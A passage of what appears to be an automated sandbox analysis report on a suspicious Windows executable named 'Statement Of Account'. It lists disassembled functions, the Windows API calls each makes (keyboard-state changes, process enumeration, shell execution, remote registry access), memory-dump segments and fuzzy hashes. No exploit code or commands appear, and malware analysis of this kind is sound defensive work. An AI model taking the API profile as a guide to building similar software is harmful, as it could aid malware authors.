Instruction Fuzzy Hash: 55613BB51083419FD300DF55CC84E6BBBE9EBC9308F148A1EF99597351D738A906CB6A

Function 0044733D Relevance: 10.7, APIs: 7, Instructions: 177COMMON

Download Yara Rule

APIs

Ellipse.GDI32(?,?,?,00000000), ref: 00447463
MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
LineTo.GDI32(?,?), ref: 004474BF
CloseFigure.GDI32(?), ref: 004474C6
SetPixel.GDI32(?,?,?,?), ref: 004474D6
Rectangle.GDI32(?,?), ref: 004474F3

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: AngleCloseEllipseFigureLineMovePixelRectangle
String ID:
API String ID: 288456094-0
Opcode ID: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
Instruction ID: d3db7697bfba14f4a3ad6627a8a5faa1010559558ae5e3f89cc6b0bd66950af4
Opcode Fuzzy Hash: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
Instruction Fuzzy Hash: 90514BB51082419FD300DF15CC84E6BBBE9EFC9308F14891EF99497351D734A906CB6A

Function 0046EA7F Relevance: 10.7, APIs: 7, Instructions: 167COMMON

Download Yara Rule

APIs

Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE

DestroyAcceleratorTable.USER32(?), ref: 0046EA9F
DeleteObject.GDI32(004C0000), ref: 0046EB4F
DestroyCursor.USER32(004F0046), ref: 0046EB67
DeleteObject.GDI32(00520000), ref: 0046EB7F
DestroyCursor.USER32(?), ref: 0046EBBF
DestroyCursor.USER32(?), ref: 0046EBCD

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Destroy$Cursor$DeleteObject$AcceleratorInvalidateRectTable
String ID:
API String ID: 3205914843-0
Opcode ID: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
Instruction ID: 42d633cefbe7d7192e7a113645d0a532909e6831d49db23f2259be933aabe8c6
Opcode Fuzzy Hash: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
Instruction Fuzzy Hash: 17513178600202DFDB14DF26D894E2A77E9FB4AB14B54446EE502CB361EB38EC41CB5E

Function 0044496C Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 004449B0
GetKeyboardState.USER32(?), ref: 004449C3
SetKeyboardState.USER32(?), ref: 00444A0F
PostMessageW.USER32(?,00000101,00000010,?), ref: 00444A3F
PostMessageW.USER32(?,00000101,00000011,?), ref: 00444A60
PostMessageW.USER32(?,00000101,00000012,?), ref: 00444AAC
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444AD1

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: d47ceab968b999e6d4944081d81f2373d9ea27f049f07d95c13b51a59d3cc885
Instruction ID: 19c159416ad4887e81d4090d30fbb5c505c675cee05c330e2fd8e115592bd25d
Opcode Fuzzy Hash: d47ceab968b999e6d4944081d81f2373d9ea27f049f07d95c13b51a59d3cc885
Instruction Fuzzy Hash: B651C5A05487D139F7369234884ABA7BFD55F8A304F08CA4EF1E5156C3D2ECE984C769

Function 00444B65 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00444BA9
GetKeyboardState.USER32(?), ref: 00444BBC
SetKeyboardState.USER32(?), ref: 00444C08
PostMessageW.USER32(?,00000100,00000010,?), ref: 00444C35
PostMessageW.USER32(?,00000100,00000011,?), ref: 00444C53
PostMessageW.USER32(?,00000100,00000012,?), ref: 00444C9C
PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444CBE

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
Instruction ID: 4493abccadab05ae7d00f733e1fa63583af0c494729619d74f1516a50adc8d80
Opcode Fuzzy Hash: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
Instruction Fuzzy Hash: A951E4F05097D139F7369364884ABA7BFE46F8A304F088A4EF1D5065C2D2ACE984C769

Function 0046A98D Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 158registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AA77

Strings

HH, xrefs: 0046A9CE

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: ConnectRegistry_wcslen
String ID: HH
API String ID: 535477410-2761332787
Opcode ID: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
Instruction ID: 7b41397762752e7dec08e47bcdb2cb2f58790b6f4670524580eb9da3090621e6
Opcode Fuzzy Hash: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
Instruction Fuzzy Hash: A2516D71208301AFD304EF65C981F5BB7A9BFC4704F40892EF685A7291D678E905CB6B

Function 00457C08 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 158COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00457C34
_memset.LIBCMT ref: 00457CE8
ShellExecuteExW.SHELL32(?), ref: 00457D34

Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012

CloseHandle.KERNEL32(?), ref: 00457DDD

Strings

<, xrefs: 00457CF4
@, xrefs: 00457CFC

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: _memset$CloseExecuteHandleShell_wcscpy_wcslen
String ID: <$@
API String ID: 1325244542-1426351568
Opcode ID: 669f3797eafbd6ea24f738bceaf78c3ad3f6bdf3b3f8ec2a74c9f7251b65f49f
Instruction ID: 09e461bdfc47c8bdd671eddb31188d347eda7c51057725e13e77015b5001baed
Opcode Fuzzy Hash: 669f3797eafbd6ea24f738bceaf78c3ad3f6bdf3b3f8ec2a74c9f7251b65f49f
Instruction Fuzzy Hash: EA510FB55083009FC710EF61D985A5BB7E4AF84709F00492EFD44AB392DB39ED48CB9A

Function 0047375F Relevance: 10.6, APIs: 7, Instructions: 150processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(?,?,?,?,?,?,?,?,?,00000002,00000000,00000014), ref: 0047379B
Process32FirstW.KERNEL32(00000000,?), ref: 004737A8
__wsplitpath.LIBCMT ref: 004737E1

Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2

_wcscat.LIBCMT ref: 004737F6
__wcsicoll.LIBCMT ref: 00473818
Process32NextW.KERNEL32(00000000,?), ref: 00473844
CloseHandle.KERNEL32(00000000,00000000,?,?), ref: 00473852

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
String ID:
API String ID: 2547909840-0
Opcode ID: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
Instruction ID: 8efa427203ffd7a45d167e3a64f6abf3f3640219bb0751621114887cb14f0fc1
Opcode Fuzzy Hash: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
Instruction Fuzzy Hash: 4751BB71544304A7D720EF61CC86FDBB3E8AF84748F00492EF58957182E775E645C7AA

Function 0047762A Relevance: 10.6, APIs: 7, Instructions: 140windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51

GetMenu.USER32 ref: 004776AA
GetMenuItemCount.USER32(00000000), ref: 004776CC
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 004776FB
_wcslen.LIBCMT ref: 0047771A

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Menu$CountItemStringWindow_wcslen
String ID:
API String ID: 1823500076-0
Opcode ID: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
Instruction ID: 4b9e656becebfc5f52f27a1d7ad2c07a58398098864d75d3a5ce1c02cc274359
Opcode Fuzzy Hash: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
Instruction Fuzzy Hash: 174117715083019FD320EF25CC45BABB3E8BF88314F10492EF55997252D7B8E9458BA9

Function 00448877 Relevance: 10.6, APIs: 7, Instructions: 130windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0044890A
SendMessageW.USER32(?,00000469,?,00000000), ref: 00448920
EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
EnableWindow.USER32(004A83D8,00000001), ref: 00448C58

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Window$Enable$Show$MessageMoveSend
String ID:
API String ID: 896007046-0
Opcode ID: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
Instruction ID: 0809a8548e22334437b8974569d6adfa08582830463fbdb99c3481629354d751
Opcode Fuzzy Hash: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
Instruction Fuzzy Hash: 63419E746043419FF7248B24C884B6FB7A1FB99305F18886EF98197391DA78A845CB59

Function 0044849C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 106windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004484C4
GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 00448562
IsMenu.USER32(?), ref: 0044857B
InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 004485D0
DrawMenuBar.USER32 ref: 004485E4

Strings

0, xrefs: 004484BC

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
Instruction ID: c1b4c65bd9dbf201e14e83578cc8030a3c247867dd5f1e451e409e2153a24926
Opcode Fuzzy Hash: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
Instruction Fuzzy Hash: 9F417F75604341AFE710CF45C984B6BB7E4FB89304F14881EFA554B391DBB4E849CB5A

Function 0047244D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104sleepCOMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32 ref: 0047247C
InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472491
Sleep.KERNEL32(0000000A), ref: 00472499
InterlockedIncrement.KERNEL32(004A7CAC), ref: 004724A4
InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472599

Strings

0vH, xrefs: 004724D5, 00472505, 00472529, 00472561

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Interlocked$DecrementIncrement$Sleep
String ID: 0vH
API String ID: 327565842-3662162768
Opcode ID: bfb173672284e31ba0a3017bb0c7d670cf276827bd066f711b3c3b49063f60eb
Instruction ID: 7246262c18bb701d5349304b0e2d21290bf7c9637501dd5a114e6955e8e78370
Opcode Fuzzy Hash: bfb173672284e31ba0a3017bb0c7d670cf276827bd066f711b3c3b49063f60eb
Instruction Fuzzy Hash: 9631D2329082259BD710DF28DD41A8A77A5EB95324F05483EFD08FB251DB78EC498BED

Function 00448AFF Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000401,?,00000000), ref: 00448B16
GetFocus.USER32 ref: 00448B1C
EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
EnableWindow.USER32(004A83D8,00000001), ref: 00448C58

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Window$Enable$Show$FocusMessageSend
String ID:
API String ID: 3429747543-0
Opcode ID: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
Instruction ID: 96ed947056310062a3fa6d2350adc65d304252fdbf70c479ab88671ed4e09c2c
Opcode Fuzzy Hash: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
Instruction Fuzzy Hash: FC31B4706443819BF7248E14C8C4BAFB7D0EB95745F04492EF981A6291DBA89845C719

Function 0045D321 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 81COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0045D32F
GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3B3
__swprintf.LIBCMT ref: 0045D3CC
SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D416

Strings

%lu, xrefs: 0045D3C6
HH, xrefs: 0045D3ED

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu$HH
API String ID: 3164766367-3924996404
Opcode ID: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
Instruction ID: e4de0c6df68350460ad5232616e5185c9d799459bd1b640414cfcbd8d86849a8
Opcode Fuzzy Hash: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
Instruction Fuzzy Hash: 85314A716083019BC310EF55D941A5BB7E4FF88704F40892EFA4597292D774EA09CB9A

Function 00450DB4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 76windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450E24
SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450E35
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450E43
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450E54
SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450E62

Strings

Msctls_Progress32, xrefs: 00450DF8

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: MessageSend
String ID: Msctls_Progress32
API String ID: 3850602802-3636473452
Opcode ID: 42656bfbb5a190feb894f1e63281698c22ff60bbec02a0e57f9bf8616b6fd2a5
Instruction ID: b51c377fab27852337593a8f268aff884918310fa347e0537580fa9f3b853d23
Opcode Fuzzy Hash: 42656bfbb5a190feb894f1e63281698c22ff60bbec02a0e57f9bf8616b6fd2a5
Instruction Fuzzy Hash: 2C2121712543007AE7209A65DC42F5BB3E9AFD8B24F214A0EF754B72D1C6B4F8418B58

Function 00415702 Relevance: 10.6, APIs: 7, Instructions: 74threadCOMMON

Download Yara Rule

APIs

___set_flsgetvalue.LIBCMT ref: 00415737
__calloc_crt.LIBCMT ref: 00415743
__getptd.LIBCMT ref: 00415750
CreateThread.KERNEL32(00000000,?,0041568B,00000000,00000004,00000000), ref: 00415776
ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00415786
GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 00415791
__dosmaperr.LIBCMT ref: 004157A9

Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23

Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6

Memory Dump Source

